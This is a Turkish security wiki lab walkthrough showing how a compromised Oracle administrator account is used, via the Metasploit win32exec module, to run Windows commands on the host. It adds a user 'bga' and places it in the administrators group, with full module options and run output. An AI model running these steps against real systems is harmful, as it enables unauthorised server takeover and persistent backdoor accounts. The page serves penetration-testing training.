Ele Geçirilen Veritabanı Yöneticisi Hesabı Üzerinden İşletim Sisteminin Ele Geçirilmesi

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Oracle veritabanında bulunan yetkili kullanıcıların dolaylı olarak işletim sistemi üzerinde komut çalıştırma hakları vardır. Bunun yapılabilmesi için bazı Java sınıflarının oluşturulması ve yönetici hesabı yetkileri ile çalıştırılması gerekmektedir. Bu komutlar SYSTEM hakları ile çalıştırıldığından sisteme kullanıcı ekleme, sistemde bir servisin başlatılması gibi çok önemli işlemlerin yapılmasına olanak sağlamaktadır. Bu iş için özelleştirilmiş Metasploit modülleri bulunmaktadır. “win32exec” modülü ile java sınıflarını kullanarak işletim sisteminde komut çalıştırabilmektedir. Bu modülün açık adı ve dizini aşağıdaki tabloda verilmiştir.

auxiliary/admin/oracle/post_exploitation/win32exec

Amaç:

Ele geçirilen veritabanı yöneticisi hesabı kullanılarak, Oracle veritabanının üzerinde bulunduğu işletim sistemini ele geçirmek.

Araç:

 • Metasploit

Lab Senaryosu:

“use auxiliary/admin/oracle/post_exploitation/win32exec” komutu ile modül sisteme tanıtılır. “show options” komutu ile doldurulması gerekli alanlar belirlenir ve doldurulur. Modülün sisteme tanıtılması ve gerekli parametrelerin tespit edilmesine ait çıktı aşağıda verilmiştir.

msf > use auxiliary/admin/oracle/post_exploitation/win32exec
msf auxiliary(win32exec) > show options
Module options (auxiliary/admin/oracle/post_exploitation/win32exec):

 Name  Current Setting      Required Description
 ----  ---------------      -------- -----------
 CMD   ipconfig             no  	  The OS command to execute.
 DBPASS  TIGER           yes  	The password to authenticate with.
 DBUSER  SCOTT         yes  	The username to authenticate with.
 RHOST                  yes  The Oracle host.
 RPORT   1521           yes  The TNS port.
 SID   ORCL             yes  The sid to authenticate with.

Sisteme yeni bir kullanıcı eklemek için gerekli düzenlemelerin yapılmıştır. İlgili çıktı aşağıda verilmiştir.

msf auxiliary(win32exec) > show options
Module options (auxiliary/admin/oracle/post_exploitation/win32exec):

 Name  Current Setting    Required Description
 ----  ---------------    -------- -----------
 CMD   net user bga bga /add   no  The OS command to execute.
 DBPASS oracle             yes  The password to authenticate with.
 DBUSER system             yes  	The username to authenticate with.
 RHOST  192.168.1.25      	yes  	The Oracle host.
 RPORT  1521              yes  The TNS port.
 SID   xporacle            yes  The sid to authenticate with.

Sisteme “bga” adında bir kullanıcı eklendiğini göstermek adına, aşağıda hedef sistem üzerinde mevcut kullanıcılar listelenmiştir.

Bgaveritabani.png

Sisteme eklenen kulacının, Windows sistemlerde en yetkili kullanıcı grubu olan “administrators” grubuna eklemek için gerekli düzenlemeler yapılmıştır. İlgili çıktı aşağıda verilmiştir.

msf auxiliary(win32exec) > show options
Module options (auxiliary/admin/oracle/post_exploitation/win32exec):

 Name  Current Setting             Required Description
 ----  ---------------                 -------- -------------------------
 CMD   net localgroup administrators bga /add no  	The OS command to execute.
 DBPASS oracle                	yes  	The password to authenticate with.
 DBUSER system                 yes  	The username to authenticate with.
 RHOST  192.168.1.25             yes  	The Oracle host.
 RPORT  1521                    yes    The TNS port.
 SID   xporacle                 	yes  	The sid to authenticate with.

Modülün bu düzenlemeler ile çalıştırılmış halinin çıktısı aşağıda verilmiştir.

msf auxiliary(win32exec) > run

[*] Creating java source 'SCJ'...
[*] CREATE successful
[*] Creating procedure 'TLJ'...
[*] CREATE successful
[*] Sending command: 'net localgroup administrators bga /add'
[*] Removing java source 'SCJ'...
[*] DROP successful
[*] Removing procedure 'TLJ'...
[*] DROP successful
[*] Auxiliary module execution completed

“bga” adındaki kullanıcının sistemde “administrators” grubuna eklendiğini göstermek adına, administrators grubuna dahil olan kullanıcılar aşağıda listelenmiştir.

Bgaveritabani2.png

Böylece Oracle veritabanı açıklığı kullanılarak işletim sistemi ele geçirilmiştir.